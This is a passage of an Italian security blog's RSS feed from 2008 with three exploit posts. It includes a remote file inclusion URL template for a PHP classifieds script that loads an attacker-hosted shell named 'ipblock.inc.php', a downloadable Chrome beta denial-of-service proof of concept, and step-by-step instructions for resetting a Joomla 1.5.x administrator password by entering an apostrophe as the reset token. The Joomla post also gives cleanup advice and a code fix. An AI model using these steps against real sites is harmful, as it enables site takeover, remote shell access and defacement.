<p>Dalle mie verifiche ho riscontrato che il file che viene ricercato nell&#8217;Url specificato è &#8220;<strong>ipblock.inc.php</strong>&#8221; e, quindi, se volete includere una shell o simili vi consiglio di chiamare il file in tale modo e inserire l&#8217;Url dell Rfi senza specificare il file.</p>
<p>Se, quindi, avete il file nel sito &#8220;http://www.miosito.it/shell/ipblock.inc.php&#8221; l&#8217;Url per la Remote File Inclusion sarà:</p>
<blockquote><p><strong>http://[Taget]/[Path]/config.inc.php?path_escape=http://www.miosito.it/shell/</strong></p>
</blockquote>
<p>A <a href="http://www.frsirt.com/english/advisories/2008/0053" target="_blank">questo link</a> potete leggere la Vulnerabilità descritta dal sito <a href="http://www.frsirt.com/" target="_blank"><strong>FrSIRT</strong></a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-snetworks-php-classifieds-50-rfi.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] Google Chrome Browser &#8211; Milw0rm</title>
		<link>http://www.capn3m0.org/google-chrome-browser-exploit-milw0rm.html</link>
		<comments>http://www.capn3m0.org/google-chrome-browser-exploit-milw0rm.html#comments</comments>
		<pubDate>Thu, 25 Sep 2008 00:09:04 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Browser]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[crash]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[milw0rm]]></category>
		<category><![CDATA[screenshot]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[security exploit]]></category>
		<category><![CDATA[taskmanager]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=58</guid>
		<description><![CDATA[Vi segnalo un&#8217;exploit che è stato pubblicato oggi sull&#8217;autorevole sito Milw0rm riguado il noto Browser Google Chrome che, tengo a precisare, è ancora in versione Beta. Tale Exploit è un DoS PoC (Proof Of Concept) che sfruttando la funzione &#8220;alert&#8221; del JavaScript opportunamente formattata consente di far aumentare il carico in memoria di Google Chrome [...]]]></description>
			<content:encoded><![CDATA[<p>Vi segnalo un&#8217;<a href="http://www.milw0rm.com/exploits/6554" target="_blank">exploit</a> che è stato pubblicato oggi sull&#8217;autorevole sito <a href="http://www.milw0rm.com/" target="_blank">Milw0rm</a> riguado il noto Browser <a href="http://www.google.com/chrome" target="_blank">Google Chrome</a> che, tengo a precisare, è ancora in versione Beta.</p>
<p>Tale Exploit è un <a href="http://it.wikipedia.org/wiki/Denial_of_service" target="_blank">DoS</a> <a href="http://it.wikipedia.org/wiki/Proof_of_concept" target="_blank">PoC (Proof Of Concept)</a> che sfruttando la funzione &#8220;alert&#8221; del JavaScript opportunamente formattata consente di far aumentare il carico in memoria di Google Chrome in pochi secondi causando un crash dell&#8217;applicativo. Ricorda come realizzazione quei JavaScript che venivano utilizzati forse 10 anni fa per far crashare i Browser (o in certi casi il Pc) generando un loop di apertura di PopUp.</p>
<p>Per chi volesse testarlo sulla propria pelle ecco l&#8217;Exploit versione Html e, successivamente, compresso con WinRar (non vorrei farvi crashare i PC  <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_smile.gif' alt="[EXPLOIT] Google Chrome Browser   Milw0rm" class='wp-smiley' title="[EXPLOIT] Google Chrome Browser   Milw0rm pics" />  ):</p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/chrome-6554.rar">Exploit Google Chrome &#8211; Milw0rm 6554</a></p>
<p>Ed eccovi alcuni screenshot del TaskManager di Chrome durante le prove.</p>
<div id="attachment_60" class="wp-caption alignnone" style="width: 310px"><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/3.jpg" rel="lightbox[58]" title="Google Chrome Normal Activity - TaskManager"><img class="size-medium wp-image-60" title="Google Chrome Normal Activity - TaskManager" src="http://www.capn3m0.org/wp-content/uploads/2008/09/3-300x192.jpg" alt="[EXPLOIT] Google Chrome Browser   Milw0rm" width="300" height="192" /></a><p class="wp-caption-text">Stato del TaskManager di Chrome appena avviato</p></div>
<p>Dopo 15 secondi la situazione era questa:</p>
<p><span id="more-58"></span></p>
<div id="attachment_61" class="wp-caption alignnone" style="width: 310px"><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/5.jpg" rel="lightbox[58]" title="Google Chrome DoS dopo 15 sec - TaskManager"><img class="size-medium wp-image-61" title="Google Chrome DoS dopo 15 sec - TaskManager" src="http://www.capn3m0.org/wp-content/uploads/2008/09/5-300x192.jpg" alt="[EXPLOIT] Google Chrome Browser   Milw0rm" width="300" height="192" /></a><p class="wp-caption-text">Lo stato della memoria dal TaskManager di Google Chrome dopo circa 15 secondi dal caricamento dell&#39;Exploit</p></div>
<p>Aspettando qualche minuto la memoria Ram del proprio Pc sarà satura e Google Chrome andrà in errore<br class="spacer_" /></p>
<div id="attachment_62" class="wp-caption alignnone" style="width: 310px"><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/6.jpg" rel="lightbox[58]" title="Google Chrome Crash"><img class="size-medium wp-image-62" title="Google Chrome Crash" src="http://www.capn3m0.org/wp-content/uploads/2008/09/6-300x207.jpg" alt="[EXPLOIT] Google Chrome Browser   Milw0rm" width="300" height="208" /></a><p class="wp-caption-text">Il risultato di poco più di un minuto di attività dell&#39;Exploit</p></div>
<p>L&#8217;unica cosa che mi permetto di osservare è che durante la navigazione, se si incappa in un sito contenente tale Exploit, potrebbe capitare di non accorgersi di quanto sta accadendo poiché, mentre Mozilla FireFox segnala e blocca l&#8217;apertura del Popup, in Google Chrome appare una barra in basso che, a mio avviso, non si nota particolarmente.</p>
<p>Rimango fiducioso verso gli Sviluppatori Google e come detto all&#8217;apertura di questo articolo tengo a sottolineare che stiamo parlando di una versione Beta. Penso che in occasione della primea Release Stabile questo genere di errori e falle saranno risolte a vantaggio di un nuovo concetto di Browser  <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_biggrin.gif' alt="[EXPLOIT] Google Chrome Browser   Milw0rm" class='wp-smiley' title="[EXPLOIT] Google Chrome Browser   Milw0rm pics" />  <br class="spacer_" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/google-chrome-browser-exploit-milw0rm.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] Joomla 1.5.x Remote Admin Password Change</title>
		<link>http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html</link>
		<comments>http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html#comments</comments>
		<pubDate>Sun, 14 Sep 2008 16:26:35 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Programmazione]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[defacement]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[joomla 1.5 vulnerabilities]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[script php cms]]></category>
		<category><![CDATA[security exploit]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/2008/09/joomla-15x-remote-admin-password-change/</guid>
		<description><![CDATA[In data 12 Agosto è stata scoperta una vulnerabilità del Cms Joomla versioni inferiori alla 1.5.6 che consente di sfruttare il componente &#8220;com_user&#8221; per editare a proprio piacimento la password di Administrator e, quindi, di sfruttare l&#8217;accesso Admin per eseguire defacement e simili. Al link seguente troverete l&#8217;annuncio ufficiale: http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html Questo, invece, quello dal Sito [...]]]></description>
			<content:encoded><![CDATA[<p>In data 12 Agosto è stata scoperta una vulnerabilità del Cms Joomla versioni inferiori alla 1.5.6 che consente di sfruttare il componente &#8220;com_user&#8221; per editare a proprio piacimento la password di Administrator e, quindi, di sfruttare l&#8217;accesso Admin per eseguire defacement e simili.</p>
<p>Al link seguente troverete l&#8217;annuncio ufficiale:</p>
<p><a href="http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html" target="_blank">http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html</a></p>
<p>Questo, invece, quello dal Sito Italiano:</p>
<p><a href="http://www.joomlaitalia.com/content/view/323/90/" target="_blank">http://www.joomlaitalia.com/content/view/323/90/</a></p>
<p><span id="more-3"></span>Sfruttare tale vulnerabilità risulta alquanto semplice poiché bastano pochi semplici passaggi per eseguire il reset:</p>
<p>1) Una volta individuato il Sito in Joomla caricare questo Url:</p>
<blockquote><p>/index.php?option=com_user&amp;view=reset&amp;layout=confirm</p>
</blockquote>
<p>2) A questo punto apparirà un form che chiederà l&#8217;inserimento di un codice che, teoricamente, avreste dovuto ricevere in mail</p>
<p>3) Inserite l&#8217;apice (&#8216;) come carattere continuate</p>
<p>4) A questo punto avrete il campo di cambio password e, inserendola, editerete direttamente il profilo Administrator <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_wink.gif' alt="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change" class='wp-smiley' title="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change pics" /> </p>
<p>Il supporto Joomla individuata la vulnerabilità (la variabile token non veniva correttamente verificata) ha provveduto a rilasciare in tempi da record la versione 1.5.6 con tale problema fixato. Dalla sua uscita sono stati scoperti ulteriori vulnerabilità che han portato alla release 1.5.7 in pochi giorni:</p>
<p>Potete scaricare dai seguenti link questa versione:</p>
<p><a href="http://joomlacode.org/gf/download/frsrelease/8376/30993/Joomla_1.5.7-Stable-Full_Package.zip" target="_blank">Joomla 1.5.7 Full Eng</a></p>
<p><a href="http://download.joomla.it/index.php?option=com_docman&amp;task=doc_download&amp;gid=717&amp;&amp;Itemid=2" target="_blank">Joomla 1.5.7 Full Ita</a></p>
<p>Per chi avesse subito un&#8217;hacking sfruttando questa vulnerabilità consiglio di aggiornare a questa versione e, nel caso siano ancora visibili &#8220;tracce&#8221; (home page cambiate) dell&#8217;hacker ho notato, per esperienza, che le pagine maggiormente colpite sono 3:</p>
<ul>
<li>configuration.php</li>
<li>index.php (del template attivo nel Cms)</li>
<li>la cartella &#8220;cache&#8221; (consiglio di svuotarla)</li>
</ul>
<p>Provvedete a ripristinare le originali e il problema è risolto.</p>
<p>Dato che trovere il vostro account Admin non accessibile visto che è stata cambiata la password sarà necessario effettuare l&#8217;accesso direttamente al PhpMyAdmin e riscrivere la password nel Database.</p>
<p>Una guida a questa operazione la potete trovare <a href="http://wiki.joomla.it/index.php?title=Recupero_password_admin" target="_blank">qui</a>.</p>
<p>Per chi non avesse sbattimento ho fatto uno scriptino veloce veloce che fa la stessa cosa. Basta copiare il file nella root della vostra installazione Joomla, richiamarlo da Browser e impostare la password.</p>
<p>Il file lo potete scaricare dal seguente link:</p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/change_pwd.rar">Joomla Change Admin Password</a></p>
<p>Infine, x chi ha molto sbattimento, di seguito la guida a come fixare tale vulnerabilità manualmente.</p>
<ol>
<li>Aprire il file &#8220;/components/com_user/models/reset.php&#8221;</li>
<li>Posizionarsi alla riga 113 dopo la riga &#8220;global $mainframe;&#8221; ed inserire il seguente codice<br />
<blockquote><p><strong>if(strlen($token) != 32) {<br />
 $this-&gt;setError(JText::_(&#8216;INVALID_TOKEN&#8217;));<br />
 return false;<br />
 }</strong></p>
</blockquote>
</li>
<li>
<pre>Fine dei giochi! <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_biggrin.gif' alt="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change" class='wp-smiley' title="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change pics" /> </pre>
</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Served from: www.capn3m0.org @ 2012-02-08 05:41:33 by W3 Total Cache -->
